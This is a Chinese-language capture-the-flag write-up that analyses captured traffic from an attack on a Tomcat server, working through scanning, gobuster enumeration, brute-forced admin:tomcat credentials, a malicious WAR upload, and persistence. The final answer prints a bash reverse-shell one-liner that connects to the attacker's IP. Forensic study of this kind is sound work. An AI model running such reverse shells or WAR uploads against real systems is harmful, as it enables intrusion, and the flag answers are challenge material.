下载附件的 pcap 包

# 题目 1

在 web 服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者 IP flag 格式:flag {ip},如:flag {127.0.0.1}

往下一划发现大量的 SYN 请求,应该是 nmap 的请求

看到来源 IP: 14.0.0.120

flag: flag{14.0.0.120}

# 题目 2

找到攻击者 IP 后请通过技术手段确定其所在地址 flag 格式: flag {城市英文小写}

查一下 IP 地址归属地嘛:https://www.ip2location.com/demo/14.0.0.120

flag: flag{guangzhou}

# 题目 3

哪一个端口提供对 web 服务器管理面板的访问? flag 格式:flag {2222}

搜一下控制台看看 tomcat 开在哪个端口上了

flag: flag{8080}

# 题目 4

经过前面对攻击者行为的分析后,攻击者运用的工具是? flag 格式:flag {名称}

开一条后面的 http 来看看

用的 gobuster

flag: flag{gobuster}

# 题目 5

攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag 格式:flag {root-123}

搜关键字 Authorization ,找到登录成功的记录,解一下 base64 的账号密码

root@iZ8vbcel8dngdb1gs24d0dZ:~#  echo "YWRtaW46dG9tY2F0" | base64 -d
admin:tomcat

flag: flag{admin-tomcat}

# 题目 6

攻击者登录成功后,先要建立反弹 shell, 请分析流量提交恶意文件的名称? flag 格式:flag {114514.txt}

倒着往前找流量可以找到,或者通过 tomcat 的上传 war 包攻击方式搜索 .war 的流量特征

flag: flag{JXQOZY.war}

# 题目 7

攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag 提示,某种任务里的信息

题目 6 的下一条流就是反弹 shell 的记录

flag: flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}